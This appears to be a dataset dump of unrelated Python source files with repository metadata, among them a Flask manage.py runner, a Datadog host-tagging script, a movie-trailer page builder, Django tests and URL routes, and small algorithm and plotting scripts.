from models.status import Status from datetime import datetime class User: """ The User object represents a person, bot or entity registered as a user in the application. username: (str) password: (str) last_seen: (str) timestamp when the user was latest recorded as active. Mutates with update_last_seen(). buddies: (dict <str, User>) status: (Status enum) """ def __init__(self, username, password): self._username = username self._password = password self._last_seen = None self._buddies = dict() self._status = Status.offline def __repr__(self): return f"User(username: {self._username}" def __str__(self): return f"{self._username}, last seen: {self._last_seen}" @property def username(self): return self._username @username.setter def username(self, val): self._username = val @property def password(self): return self._password @password.setter def password(self, val): self._password = val @property def buddies(self): return self._buddies @property def last_seen(self): return self._last_seen def update_last_seen(self): self._last_seen = datetime.now().strftime("%m/%d/%Y, %H:%M:%S") def add_buddy(self, buddy): self._buddies['buddies'] = buddy def remove_buddy(self, username) -> bool: try: del self._buddies[username] except KeyError: return False return True
740
0
317
ebc9c14fe5a89e7e13d7881bbe679c8d68478cf4
1,972
py
Python
entertainmentCenter.py
Arie3301/udacity-movietrailers
b23b1981ba71fd1535e7a77aa4332413586ac56e
[ "MIT" ]
null
null
null
entertainmentCenter.py
Arie3301/udacity-movietrailers
b23b1981ba71fd1535e7a77aa4332413586ac56e
[ "MIT" ]
null
null
null
entertainmentCenter.py
Arie3301/udacity-movietrailers
b23b1981ba71fd1535e7a77aa4332413586ac56e
[ "MIT" ]
null
null
null
import media import fresh_tomatoes def main(): """Generate an HTML page to show movies with corresponding information.""" toy_story = media.Movie( "Toy Story", "A story of a boy and his toys that come to life.", "https://upload.wikimedia.org/wikipedia/en/1/13/Toy_Story.jpg", "https://www.youtube.com/watch?v=KYz2wyBy3kc" ) forrest_gump = media.Movie( "Forrest Gump", "A story of an imbecile who makes history.", "https://upload.wikimedia.org/wikipedia/en/6/67/Forrest_Gump_poster.jpg", # NOQA "https://www.youtube.com/watch?v=77ij5gCTjYU" ) goodfellas = media.Movie( "Goodfellas", "The rise and fall of a gangster.", "https://upload.wikimedia.org/wikipedia/en/7/7b/Goodfellas.jpg", "https://www.youtube.com/watch?v=qo5jJpHtI1Y" ) lion_king = media.Movie( "The Lion King", "Hamlet on the Savanah.", "https://upload.wikimedia.org/wikipedia/en/3/3d/The_Lion_King_poster.jpg", # NOQA "https://www.youtube.com/watch?v=4sj1MT05lAA" ) hercules = media.Movie( "Hercules", "The son of Zeus must earn his place back among the gods.", "https://upload.wikimedia.org/wikipedia/en/6/65/Hercules_%281997_film%29_poster.jpg", # NOQA "https://www.youtube.com/watch?v=ZvtspevZxpg" ) oceans_11 = media.Movie( "Ocean's Eleven", "A gang of eleven makes a casino heist.", "https://upload.wikimedia.org/wikipedia/en/6/68/Ocean%27s_Eleven_2001_Poster.jpg", # NOQA "https://www.youtube.com/watch?v=imm6OR605UI" ) # fresh_tomatoes.open_movies_page() requires its argument in list format movies = [ toy_story, forrest_gump, goodfellas, lion_king, hercules, oceans_11 ] fresh_tomatoes.open_movies_page(movies) if __name__ == "__main__": main()
30.8125
101
0.619168
import media import fresh_tomatoes def main(): """Generate an HTML page to show movies with corresponding information.""" toy_story = media.Movie( "Toy Story", "A story of a boy and his toys that come to life.", "https://upload.wikimedia.org/wikipedia/en/1/13/Toy_Story.jpg", "https://www.youtube.com/watch?v=KYz2wyBy3kc" ) forrest_gump = media.Movie( "Forrest Gump", "A story of an imbecile who makes history.", "https://upload.wikimedia.org/wikipedia/en/6/67/Forrest_Gump_poster.jpg", # NOQA "https://www.youtube.com/watch?v=77ij5gCTjYU" ) goodfellas = media.Movie( "Goodfellas", "The rise and fall of a gangster.", "https://upload.wikimedia.org/wikipedia/en/7/7b/Goodfellas.jpg", "https://www.youtube.com/watch?v=qo5jJpHtI1Y" ) lion_king = media.Movie( "The Lion King", "Hamlet on the Savanah.", "https://upload.wikimedia.org/wikipedia/en/3/3d/The_Lion_King_poster.jpg", # NOQA "https://www.youtube.com/watch?v=4sj1MT05lAA" ) hercules = media.Movie( "Hercules", "The son of Zeus must earn his place back among the gods.", "https://upload.wikimedia.org/wikipedia/en/6/65/Hercules_%281997_film%29_poster.jpg", # NOQA "https://www.youtube.com/watch?v=ZvtspevZxpg" ) oceans_11 = media.Movie( "Ocean's Eleven", "A gang of eleven makes a casino heist.", "https://upload.wikimedia.org/wikipedia/en/6/68/Ocean%27s_Eleven_2001_Poster.jpg", # NOQA "https://www.youtube.com/watch?v=imm6OR605UI" ) # fresh_tomatoes.open_movies_page() requires its argument in list format movies = [ toy_story, forrest_gump, goodfellas, lion_king, hercules, oceans_11 ] fresh_tomatoes.open_movies_page(movies) if __name__ == "__main__": main()
0
0
0
a4ae68cc8e486e00feeb0701d05b2910a94a4ebd
4,624
py
Python
manage.py
alessiosavi/PyParser
788f783bd17ab5d63cec62af6d54b94f2b1737c9
[ "Apache-2.0" ]
null
null
null
manage.py
alessiosavi/PyParser
788f783bd17ab5d63cec62af6d54b94f2b1737c9
[ "Apache-2.0" ]
null
null
null
manage.py
alessiosavi/PyParser
788f783bd17ab5d63cec62af6d54b94f2b1737c9
[ "Apache-2.0" ]
null
null
null
# -*- coding: utf-8 -*- import argparse import os import signal import subprocess import sys # Project defaults from utils import utils # ===== LOAD CONFIGURATION FILE ===== CONFIG_FILE = "conf/conf.json" CFG, log, = utils.init_main_data(CONFIG_FILE) if CFG is None or log is None: print("Unable to load {}".format(CONFIG_FILE)) sys.exit(2) DEFAULT_IP = "{}:{}".format(CFG['network']['host'], CFG['network']["port"]) FLASK_APP = 'server/__init__.py' cm = CommandManager() cm.add(Command( "build", "compiles python files in project into .pyc binaries", lambda c: 'python -m compileall .')) cm.add(Command( "start", "runs server with gunicorn in a production setting", lambda c: 'gunicorn -b {0}:{1} --timeout 99999 server:app'.format(c['host'], c['port']), { 'FLASK_APP': FLASK_APP, 'FLASK_DEBUG': 'false' })) cm.add(Command( "run", "runs dev server using Flask's native debugger & backend reloader", lambda c: 'python -m flask run --host={0} --port={1} --debugger --reload'.format(c['host'], c['port']), { 'FLASK_APP': FLASK_APP, 'FLASK_DEBUG': 'true' })) cm.add(Command( "livereload", "runs dev server using livereload for dynamic webpage reloading", lambda c: 'python -m flask run', { 'FLASK_APP': FLASK_APP, 'FLASK_LIVE_RELOAD': 'true', })) cm.add(Command( "debug", "runs dev server in debug mode; use with an IDE's remote debugger", lambda c: 'python -m flask run --host={0} --port={1} --no-debugger --no-reload'.format(c['host'], c['port']), { 'FLASK_APP': FLASK_APP, 'FLASK_DEBUG': 'true' })) cm.add(Command( "test", "runs all tests inside of `tests` directory", lambda c: 'python -m unittest discover -s tests -p "*.py"')) # Create and format argument parser for CLI parser = argparse.ArgumentParser(description=cm.availableCommands(), formatter_class=argparse.RawDescriptionHelpFormatter) parser.add_argument("subcommand", help="subcommand to run (see list above)") parser.add_argument("ipaddress", nargs='?', default=DEFAULT_IP, help="address and port to run on (i.e. 
{0})".format(DEFAULT_IP)) # Take in command line input for configuration try: args = parser.parse_args() cmd = args.subcommand addr = args.ipaddress.split(':') cm.configure({ 'host': addr[0], 'port': addr[1], }) cm.run(cmd) except KeyboardInterrupt: if 'FLASK_LIVE_RELOAD' in os.environ and os.environ['FLASK_LIVE_RELOAD'] == 'true': livereload_check() except: if len(sys.argv) == 1: log.debug(cm.availableCommands()) sys.exit(0)
29.832258
113
0.601644
# -*- coding: utf-8 -*- import argparse import os import signal import subprocess import sys # Project defaults from utils import utils # ===== LOAD CONFIGURATION FILE ===== CONFIG_FILE = "conf/conf.json" CFG, log, = utils.init_main_data(CONFIG_FILE) if CFG is None or log is None: print("Unable to load {}".format(CONFIG_FILE)) sys.exit(2) DEFAULT_IP = "{}:{}".format(CFG['network']['host'], CFG['network']["port"]) FLASK_APP = 'server/__init__.py' class Command: def __init__(self, name, descr, runcmd, env=None, conf=None): if conf is None: conf = {} if env is None: env = {} self.name = name self.descr = descr self.runcmd = runcmd self.env = env self.conf = conf def run(self, conf): cmd = self.runcmd(conf) env = os.environ env.update(conf) env.update(self.env) subprocess.call(cmd, env=env, shell=True) class CommandManager: def __init__(self): self.commands = {} def add(self, command): self.commands[command.name] = command def configure(self, conf): self.conf = conf def run(self, command): if command in self.commands: self.commands[command].run(self.conf) else: log.debug("invalid command specified\n") log.debug(self.availableCommands()) def availableCommands(self): commands = sorted(self.commands.values(), key=lambda c: c.name) space = max([len(c.name) for c in commands]) + 2 description = 'available subcommands:\n' for c in commands: description += ' ' + c.name + ' ' * (space - len(c.name)) + c.descr + '\n' return description cm = CommandManager() cm.add(Command( "build", "compiles python files in project into .pyc binaries", lambda c: 'python -m compileall .')) cm.add(Command( "start", "runs server with gunicorn in a production setting", lambda c: 'gunicorn -b {0}:{1} --timeout 99999 server:app'.format(c['host'], c['port']), { 'FLASK_APP': FLASK_APP, 'FLASK_DEBUG': 'false' })) cm.add(Command( "run", "runs dev server using Flask's native debugger & backend reloader", lambda c: 'python -m flask run --host={0} --port={1} --debugger --reload'.format(c['host'], 
c['port']), { 'FLASK_APP': FLASK_APP, 'FLASK_DEBUG': 'true' })) cm.add(Command( "livereload", "runs dev server using livereload for dynamic webpage reloading", lambda c: 'python -m flask run', { 'FLASK_APP': FLASK_APP, 'FLASK_LIVE_RELOAD': 'true', })) cm.add(Command( "debug", "runs dev server in debug mode; use with an IDE's remote debugger", lambda c: 'python -m flask run --host={0} --port={1} --no-debugger --no-reload'.format(c['host'], c['port']), { 'FLASK_APP': FLASK_APP, 'FLASK_DEBUG': 'true' })) cm.add(Command( "test", "runs all tests inside of `tests` directory", lambda c: 'python -m unittest discover -s tests -p "*.py"')) # Create and format argument parser for CLI parser = argparse.ArgumentParser(description=cm.availableCommands(), formatter_class=argparse.RawDescriptionHelpFormatter) parser.add_argument("subcommand", help="subcommand to run (see list above)") parser.add_argument("ipaddress", nargs='?', default=DEFAULT_IP, help="address and port to run on (i.e. {0})".format(DEFAULT_IP)) def livereload_check(): check = subprocess.call("lsof -n -i4TCP:{}".format(CFG['network']["port"]), shell=True) if check == 0: output = subprocess.check_output( "ps -ef | egrep 'python manage.py|gunicorn' | egrep -v grep | awk '{print $3}'", shell=True).decode().strip() for _pid in output.split("\n"): pypid = int(_pid) os.kill(pypid, signal.SIGKILL) log.debug("Discovered rogue Python process: {0}".format(pypid)) log.debug("Killing PID {0}...".format(pypid)) else: log.debug(" No rogue Python process running") # Take in command line input for configuration try: args = parser.parse_args() cmd = args.subcommand addr = args.ipaddress.split(':') cm.configure({ 'host': addr[0], 'port': addr[1], }) cm.run(cmd) except KeyboardInterrupt: if 'FLASK_LIVE_RELOAD' in os.environ and os.environ['FLASK_LIVE_RELOAD'] == 'true': livereload_check() except: if len(sys.argv) == 1: log.debug(cm.availableCommands()) sys.exit(0)
1,655
-7
256
1e2d804940cb39ed13692c328011679d3bd4c173
2,285
py
Python
examples/textbook/salpeter.py
joshuawall/amuse
c2034074ee76c08057c4faa96c32044ab40952e9
[ "Apache-2.0" ]
1
2019-12-28T22:47:51.000Z
2019-12-28T22:47:51.000Z
examples/textbook/salpeter.py
joshuawall/amuse
c2034074ee76c08057c4faa96c32044ab40952e9
[ "Apache-2.0" ]
null
null
null
examples/textbook/salpeter.py
joshuawall/amuse
c2034074ee76c08057c4faa96c32044ab40952e9
[ "Apache-2.0" ]
2
2021-11-19T04:41:37.000Z
2021-11-20T02:11:17.000Z
from amuse.lab import new_powerlaw_mass_distribution ###BOOKLISTSTART### import numpy import math from amuse.units import units from matplotlib import pyplot from prepare_figure import figure_frame, get_distinct ###BOOKLISTSTOP### if __name__ in ('__main__', '__plot__'): o, arguments = new_option_parser().parse_args() numpy.random.seed(31415) generate_power_law_mass_function(**o.__dict__)
36.854839
76
0.623632
from amuse.lab import new_powerlaw_mass_distribution def generate_power_law_mass_function(N, Mmin, Mmax, ximf): masses = new_powerlaw_mass_distribution(N, Mmin, Mmax, ximf) plot_mass_function(masses, ximf) ###BOOKLISTSTART### import numpy import math from amuse.units import units from matplotlib import pyplot from prepare_figure import figure_frame, get_distinct def plot_mass_function(masses, ximf): Mmin = masses.min() Mmax = masses.max() lm = math.log10(0.5*Mmin.value_in(units.MSun)) lM = math.log10(1.5*Mmax.value_in(units.MSun)) bins = 10**numpy.linspace(lm, lM, 51) Nbin, bin_edges= numpy.histogram(masses.value_in(units.MSun), bins=bins) y = Nbin / (bin_edges[1:] - bin_edges[:-1]) x = (bin_edges[1:] + bin_edges[:-1]) / 2.0 for i in range(len(y)): y[i] = max(y[i], 1.e-10) fig, ax = figure_frame("M$_\odot$", "N", xsize=12, ysize=8) colors = get_distinct(2) pyplot.scatter(x, y, s=100, c=colors[0], lw=0) c = ((Mmax.value_in(units.MSun)**(ximf+1)) \ - (Mmin.value_in(units.MSun)**(ximf+1))) / (ximf+1) pyplot.plot(x, len(masses)/c * (x**ximf), c=colors[1]) pyplot.loglog() save_file = "salpeter.png" pyplot.savefig(save_file) print '\nSaved figure in file', save_file,'\n' pyplot.show() ###BOOKLISTSTOP### def new_option_parser(): from amuse.units.optparse import OptionParser result = OptionParser() result.add_option("-N", dest="N", type="int",default = 1000, help="number of stars [10]") result.add_option("-m", unit=units.MSun, dest="Mmin", type="float",default = 1|units.MSun, help="minimum mass of the mass function [0.1] %unit") result.add_option("-M", unit=units.MSun, dest="Mmax", type="float",default = 100|units.MSun, help="maximum mass of the mass function [100] %unit") result.add_option("-x", dest="ximf", type="float",default = -2.35, help="mass function slope [-2.35]") return result if __name__ in ('__main__', '__plot__'): o, arguments = new_option_parser().parse_args() numpy.random.seed(31415) generate_power_law_mass_function(**o.__dict__)
1,808
0
69
fca339414723ecddd70b58456b989c6b107a2352
3,396
py
Python
gpxtrackposter/year_range.py
narfel/GpxTrackPoster
57aa34feb43f8b76ef40d1500067e532d2ff439a
[ "MIT" ]
1
2021-07-09T02:57:08.000Z
2021-07-09T02:57:08.000Z
gpxtrackposter/year_range.py
narfel/GpxTrackPoster
57aa34feb43f8b76ef40d1500067e532d2ff439a
[ "MIT" ]
null
null
null
gpxtrackposter/year_range.py
narfel/GpxTrackPoster
57aa34feb43f8b76ef40d1500067e532d2ff439a
[ "MIT" ]
null
null
null
"""Represent a range of years, with ability to update based on a track""" # Copyright 2016-2020 Florian Pigorsch & Contributors. All rights reserved. # # Use of this source code is governed by a MIT-style # license that can be found in the LICENSE file. import datetime import re import typing class YearRange: """Represent a range of years, with ability to update based on a track Attributes: from_year: First year in range (lower) to_year: Last year in range (higher) Methods: parse: Parse a string into lower and upper bounds add: Adjust bounds based on a track contains: If track is contained in the range count: Number of years in range """ def __init__(self) -> None: """Inits YearRange with empty bounds -- to be built after init""" self.from_year: typing.Optional[int] = None self.to_year: typing.Optional[int] = None def parse(self, s: str) -> bool: """Parse a plaintext range of years into a pair of years Attempt to turn the input string into a pair of year values, from_year and to_year. If one year is passed, both from_year and to_year will be set to that year. If a range like '2016-2018' is passed, from_year will be set to 2016, and to_year will be set to 2018. Args: s: A string representing a range of years or a single year Returns: True if the range was successfully parsed, False if not. 
""" if s == "all": self.from_year = None self.to_year = None return True m = re.match(r"^\d+$", s) if m: self.from_year = int(s) self.to_year = self.from_year return True m = re.match(r"^(\d+)-(\d+)$", s) if m: y1, y2 = int(m.group(1)), int(m.group(2)) if y1 <= y2: self.from_year = y1 self.to_year = y2 return True return False def add(self, t: datetime.datetime) -> None: """For the given t, update from_year and to_year to include that timestamp""" if self.from_year is None: self.from_year = t.year self.to_year = t.year return assert self.from_year is not None assert self.to_year is not None if t.year < self.from_year: self.from_year = t.year elif t.year > self.to_year: self.to_year = t.year def contains(self, t: datetime.datetime) -> bool: """Return True if current year range contains t, False if not""" if self.from_year is None: return True assert self.from_year is not None assert self.to_year is not None return self.from_year <= t.year <= self.to_year def count(self) -> int: """Return number of years contained in the current range""" if self.from_year is None: return 0 assert self.to_year is not None return 1 + self.to_year - self.from_year
32.653846
98
0.594229
"""Represent a range of years, with ability to update based on a track""" # Copyright 2016-2020 Florian Pigorsch & Contributors. All rights reserved. # # Use of this source code is governed by a MIT-style # license that can be found in the LICENSE file. import datetime import re import typing class YearRange: """Represent a range of years, with ability to update based on a track Attributes: from_year: First year in range (lower) to_year: Last year in range (higher) Methods: parse: Parse a string into lower and upper bounds add: Adjust bounds based on a track contains: If track is contained in the range count: Number of years in range """ def __init__(self) -> None: """Inits YearRange with empty bounds -- to be built after init""" self.from_year: typing.Optional[int] = None self.to_year: typing.Optional[int] = None def parse(self, s: str) -> bool: """Parse a plaintext range of years into a pair of years Attempt to turn the input string into a pair of year values, from_year and to_year. If one year is passed, both from_year and to_year will be set to that year. If a range like '2016-2018' is passed, from_year will be set to 2016, and to_year will be set to 2018. Args: s: A string representing a range of years or a single year Returns: True if the range was successfully parsed, False if not. 
""" if s == "all": self.from_year = None self.to_year = None return True m = re.match(r"^\d+$", s) if m: self.from_year = int(s) self.to_year = self.from_year return True m = re.match(r"^(\d+)-(\d+)$", s) if m: y1, y2 = int(m.group(1)), int(m.group(2)) if y1 <= y2: self.from_year = y1 self.to_year = y2 return True return False def clear(self) -> None: self.from_year = None self.to_year = None def add(self, t: datetime.datetime) -> None: """For the given t, update from_year and to_year to include that timestamp""" if self.from_year is None: self.from_year = t.year self.to_year = t.year return assert self.from_year is not None assert self.to_year is not None if t.year < self.from_year: self.from_year = t.year elif t.year > self.to_year: self.to_year = t.year def contains(self, t: datetime.datetime) -> bool: """Return True if current year range contains t, False if not""" if self.from_year is None: return True assert self.from_year is not None assert self.to_year is not None return self.from_year <= t.year <= self.to_year def count(self) -> int: """Return number of years contained in the current range""" if self.from_year is None: return 0 assert self.to_year is not None return 1 + self.to_year - self.from_year def iter(self) -> typing.Generator[int, None, None]: if self.from_year is None: return assert self.to_year is not None for year in range(self.from_year, self.to_year + 1): yield year
271
0
54
efb255992679f342c7ebd054a3ecc97828dfdb96
112
py
Python
moses/char_rnn/__init__.py
samadejacobs/moses
1fda9a06ef645f533191990cd10834e52ec29a37
[ "MIT" ]
null
null
null
moses/char_rnn/__init__.py
samadejacobs/moses
1fda9a06ef645f533191990cd10834e52ec29a37
[ "MIT" ]
null
null
null
moses/char_rnn/__init__.py
samadejacobs/moses
1fda9a06ef645f533191990cd10834e52ec29a37
[ "MIT" ]
3
2020-03-31T16:07:20.000Z
2021-06-21T16:15:57.000Z
from .config import get_parser as char_rnn_parser from .model import CharRNN from .trainer import CharRNNTrainer
37.333333
49
0.857143
from .config import get_parser as char_rnn_parser from .model import CharRNN from .trainer import CharRNNTrainer
0
0
0
5b54b094c6f4a462492a448757b9d3954d49c8d5
1,109
py
Python
pathSum.py
pflun/learningAlgorithms
3101e989488dfc8a56f1bf256a1c03a837fe7d97
[ "MIT" ]
null
null
null
pathSum.py
pflun/learningAlgorithms
3101e989488dfc8a56f1bf256a1c03a837fe7d97
[ "MIT" ]
null
null
null
pathSum.py
pflun/learningAlgorithms
3101e989488dfc8a56f1bf256a1c03a837fe7d97
[ "MIT" ]
null
null
null
# Definition for a binary tree node. from sortedArrayToBST import Solution test = Solution() head_node = test.sortedArrayToBST([1, 2, 3, 4, 5, 6, 7]) test1 = Solution1() print test1.pathSum(head_node, 7) # 4 # 2 6 # 1 3 5 7
27.04878
93
0.555455
# Definition for a binary tree node. from sortedArrayToBST import Solution class TreeNode(object): def __init__(self, x): self.val = x self.left = None self.right = None class Solution1(object): def __init__(self): # Tip: instance variable unique to each instance (not really related to this problem) self.store = [] def pathSum(self, root, sum): ls = [] self.dfs(root, sum, ls) return self.store def dfs(self, root, target, ls): if root: if not root.left and not root.right: if root.val == target: ls.append(root.val) self.store.append(ls) # Tip: ls + [root.val] to pass tmp path if root.left: self.dfs(root.left, target - root.val, ls + [root.val]) if root.right: self.dfs(root.right, target - root.val, ls + [root.val]) test = Solution() head_node = test.sortedArrayToBST([1, 2, 3, 4, 5, 6, 7]) test1 = Solution1() print test1.pathSum(head_node, 7) # 4 # 2 6 # 1 3 5 7
721
5
152
49ef48b7da7d171f74104bc9e7bd0238f46fb42b
2,239
py
Python
query_hosts_create_tags.py
nadaj/Miscellany
0c7beb9cb9f3552cf25075d847e5d3bd28054c71
[ "BSD-3-Clause" ]
155
2017-01-04T16:45:57.000Z
2022-03-24T18:19:27.000Z
query_hosts_create_tags.py
nadaj/Miscellany
0c7beb9cb9f3552cf25075d847e5d3bd28054c71
[ "BSD-3-Clause" ]
42
2017-03-02T21:20:10.000Z
2021-10-13T13:10:03.000Z
query_hosts_create_tags.py
nadaj/Miscellany
0c7beb9cb9f3552cf25075d847e5d3bd28054c71
[ "BSD-3-Clause" ]
127
2015-12-21T19:32:58.000Z
2022-03-10T12:03:36.000Z
import json import os import requests import pprint from datadog import initialize, api # source /opt/datadog/datadog-agent/venv/bin/activate DD_API_KEY = os.getenv('DD_API_KEY', '') DD_APP_KEY = os.getenv('DD_APP_KEY', '') options = { 'api_key': DD_API_KEY, 'app_key': DD_APP_KEY } initialize(**options) initial_filter_string = '' # string to query datadog api for matching hosts. this may return more hosts than you are looking for. query_key = 'host_name' # any key of the host object (i.e. 'platform', 'id') to use when iterating over the search results. host_name is default. query_string = 'splunk' # query string to run against search string create_tags = False # set to true to create tags on matchings hosts host_count = api.Hosts.search(filter=initial_filter_string)['total_matching'] print('%r hosts matching initial_filter_string' % host_count) num_req = host_count // 100 + 1 print('%r number of api requests to query all matching hosts' % num_req) matching_hosts = [] start_index = 0 for i in range(1, num_req+1): print('api request %r of %r' % (i, num_req)) host_list = api.Hosts.search(filter=initial_filter_string, sort_field='apps', count=100, start=start_index)['host_list'] start_index += 100 for host in host_list: matching_hosts.append(host) print('Matching host count: %r' % len(matching_hosts)) # run a second, more granular query to identify hosts all_hostnames = [] hosts_to_tag = [] for host in matching_hosts: host_name = host['host_name'] # get the host name for adding tags all_hostnames.append(host_name) value = host[query_key] # ex host['platform'], hosts['id'], etc if query_string in value: # contains, startswith, endswith, etc hosts_to_tag.append(host_name) print('identified host %s' % host_name) print('Host count: %r' % host_count) print('Unique host names: %r' % len(set(all_hostnames))) print('Hosts to tag: %r' % len(hosts_to_tag)) if create_tags: # add a tag to hosts for host_name in hosts_to_tag: res = api.Tag.create(host_name, 
tags=['tag_name:tag_value']) if 'errors' in res: print(res['errors']) else: print("Set 'create_tags' = True to create tags for matchings hosts.")
34.984375
146
0.712372
import json import os import requests import pprint from datadog import initialize, api # source /opt/datadog/datadog-agent/venv/bin/activate DD_API_KEY = os.getenv('DD_API_KEY', '') DD_APP_KEY = os.getenv('DD_APP_KEY', '') options = { 'api_key': DD_API_KEY, 'app_key': DD_APP_KEY } initialize(**options) initial_filter_string = '' # string to query datadog api for matching hosts. this may return more hosts than you are looking for. query_key = 'host_name' # any key of the host object (i.e. 'platform', 'id') to use when iterating over the search results. host_name is default. query_string = 'splunk' # query string to run against search string create_tags = False # set to true to create tags on matchings hosts host_count = api.Hosts.search(filter=initial_filter_string)['total_matching'] print('%r hosts matching initial_filter_string' % host_count) num_req = host_count // 100 + 1 print('%r number of api requests to query all matching hosts' % num_req) matching_hosts = [] start_index = 0 for i in range(1, num_req+1): print('api request %r of %r' % (i, num_req)) host_list = api.Hosts.search(filter=initial_filter_string, sort_field='apps', count=100, start=start_index)['host_list'] start_index += 100 for host in host_list: matching_hosts.append(host) print('Matching host count: %r' % len(matching_hosts)) # run a second, more granular query to identify hosts all_hostnames = [] hosts_to_tag = [] for host in matching_hosts: host_name = host['host_name'] # get the host name for adding tags all_hostnames.append(host_name) value = host[query_key] # ex host['platform'], hosts['id'], etc if query_string in value: # contains, startswith, endswith, etc hosts_to_tag.append(host_name) print('identified host %s' % host_name) print('Host count: %r' % host_count) print('Unique host names: %r' % len(set(all_hostnames))) print('Hosts to tag: %r' % len(hosts_to_tag)) if create_tags: # add a tag to hosts for host_name in hosts_to_tag: res = api.Tag.create(host_name, 
tags=['tag_name:tag_value']) if 'errors' in res: print(res['errors']) else: print("Set 'create_tags' = True to create tags for matchings hosts.")
0
0
0
5100719deadc1ab5f5956fa7c4b8e9f8c772c93c
567
py
Python
linter.py
CudaText-addons/cuda_lint_innosetup
159b119f5c007f36e29c1d005188c6ec2ece1784
[ "MIT" ]
1
2021-05-08T07:45:19.000Z
2021-05-08T07:45:19.000Z
linter.py
CudaText-addons/cuda_lint_innosetup
159b119f5c007f36e29c1d005188c6ec2ece1784
[ "MIT" ]
null
null
null
linter.py
CudaText-addons/cuda_lint_innosetup
159b119f5c007f36e29c1d005188c6ec2ece1784
[ "MIT" ]
null
null
null
# # linter.py # Linter for SublimeLinter3, a code checking framework for Sublime Text 3 # # Written by Jan T. Sott # Copyright (c) 2017 Jan T. Sott # # License: MIT # Ported to CudaLint by Alexey T. # from cuda_lint import Linter, util class Iscc(Linter): """Provides an interface to the ISCC executable.""" cmd = ('ISCC.exe', '/Q', '/O-', '@') syntax = 'Inno Setup' regex = ( r'^Error on line (?P<line>\d+) in (?P<file>.*\.iss): (?P<message>.+)$' ) multiline = True error_stream = util.STREAM_STDERR line_col_base = (0, 1)
22.68
78
0.61552
# # linter.py # Linter for SublimeLinter3, a code checking framework for Sublime Text 3 # # Written by Jan T. Sott # Copyright (c) 2017 Jan T. Sott # # License: MIT # Ported to CudaLint by Alexey T. # from cuda_lint import Linter, util class Iscc(Linter): """Provides an interface to the ISCC executable.""" cmd = ('ISCC.exe', '/Q', '/O-', '@') syntax = 'Inno Setup' regex = ( r'^Error on line (?P<line>\d+) in (?P<file>.*\.iss): (?P<message>.+)$' ) multiline = True error_stream = util.STREAM_STDERR line_col_base = (0, 1)
0
0
0
66146d833c1b018ec787f7efcec2dd545d37bf12
999
py
Python
Authentication/tests.py
MuhammadSalahAli/TolkProject
38e655be8f1776c216f1e7b3a727b39a1ea06cfb
[ "MIT" ]
36
2021-01-18T11:58:17.000Z
2021-12-09T21:40:29.000Z
Authentication/tests.py
MuhammadSalahAli/TolkProject
38e655be8f1776c216f1e7b3a727b39a1ea06cfb
[ "MIT" ]
2
2021-07-02T04:07:58.000Z
2021-08-22T21:23:33.000Z
Authentication/tests.py
MuhammadSalahAli/TolkProject
38e655be8f1776c216f1e7b3a727b39a1ea06cfb
[ "MIT" ]
7
2021-08-09T02:21:49.000Z
2022-02-06T11:04:04.000Z
from django.test import TestCase from django.contrib.auth import get_user_model import json User = get_user_model()
37
113
0.697698
from django.test import TestCase from django.contrib.auth import get_user_model import json User = get_user_model() class TestAuthentication(TestCase): def setUp(self) -> None: self.user = User.objects.create_user(email='guest_1@user.com') self.user.set_password('password') self.user.save() def test_bad_credentials(self): response = self.client.post('/api/login/', data={'email': 'guest_1user.com', 'password': 'bad password'}) self.assertEqual(response.status_code, 400) is_authenticated = self.client.get('/api/authenticated/').data['is_authenticated'] self.assertFalse(is_authenticated) def test_user_authentication(self): response = self.client.post('/api/login/', data={'email': 'guest_1@user.com', 'password': 'password'}) self.assertEqual(response.status_code, 202) is_authenticated = self.client.get('/api/authenticated/').data['is_authenticated'] self.assertTrue(is_authenticated)
763
14
104
decee34e0333f716cf45f2e9c465d3d7ff1c09fd
2,109
py
Python
core/urls.py
Aju100/WikimediaDataProject
f31e7856e49f510628e2ce65f40844b1f762a546
[ "MIT" ]
1
2021-06-08T02:37:04.000Z
2021-06-08T02:37:04.000Z
core/urls.py
Aju100/WikimediaDataProject
f31e7856e49f510628e2ce65f40844b1f762a546
[ "MIT" ]
null
null
null
core/urls.py
Aju100/WikimediaDataProject
f31e7856e49f510628e2ce65f40844b1f762a546
[ "MIT" ]
null
null
null
from django.urls import path, include from . import views urlpatterns = [ path('', views.index, name='index'), path('populated_cities', views.populated_cities_query, name ='populated_cities'), path('start_tour_cities', views.start_tour_cities, name ='start_tour_cities'), path('stop_tour_cities', views.stop_tour_cities, name ='stop_tour_cities'), path('premierLeague_stadiums', views.premierLeague_stadiums_query, name ='premierLeague_stadiums'), path('start_tour_stadiums', views.start_tour_stadiums, name ='start_tour_stadiums'), path('stop_tour_stadiums', views.stop_tour_stadiums, name ='stop_tour_stadiums'), path('longest_rivers', views.longest_rivers_query, name ='longest_rivers'), path('tour_experience', views.tour_experience, name ='tour_experience'), path('line_track_experience', views.line_track_experience, name ='line_track_experience'), path('stop_experience', views.stop_experience, name ='stop_experience'), path('spanish_airports', views.spanish_airports_query, name ='spanish_airports'), path('start_tour_airports', views.start_tour_airports, name ='start_tour_airports'), path('stop_tour_airports', views.stop_tour_airports, name ='stop_tour_airports'), path('summer_olympic_games_aux', views.olympic_games_query_aux, name ='summer_olympic_games_aux'), path('summer_olympic_games', views.olympic_games_query, name ='summer_olympic_games'), path('try_demo', views.try_demo, name ='try_demo'), path('start_lleida_tour', views.start_lleida_tour, name ='start_lleida_tour'), path('start_bayern_tour', views.start_bayern_tour, name ='start_bayern_tour'), path('start_barcelona92', views.start_barcelona92, name ='start_barcelona92'), path('stop_tour_demo', views.stop_tour_demo, name ='stop_tour_demo'), path('clear_KML_folder', views.clear_KML_folder, name ='clear_KML_folder'), path('stop_current_tour', views.stop_current_tour, name ='stop_current_tour'), path('relaunch_LG', views.relaunch_LG, name ='relaunch_LG'), path('clear_LG_cache', views.clear_LG_cache, name 
='clear_LG_cache') ]
70.3
103
0.766714
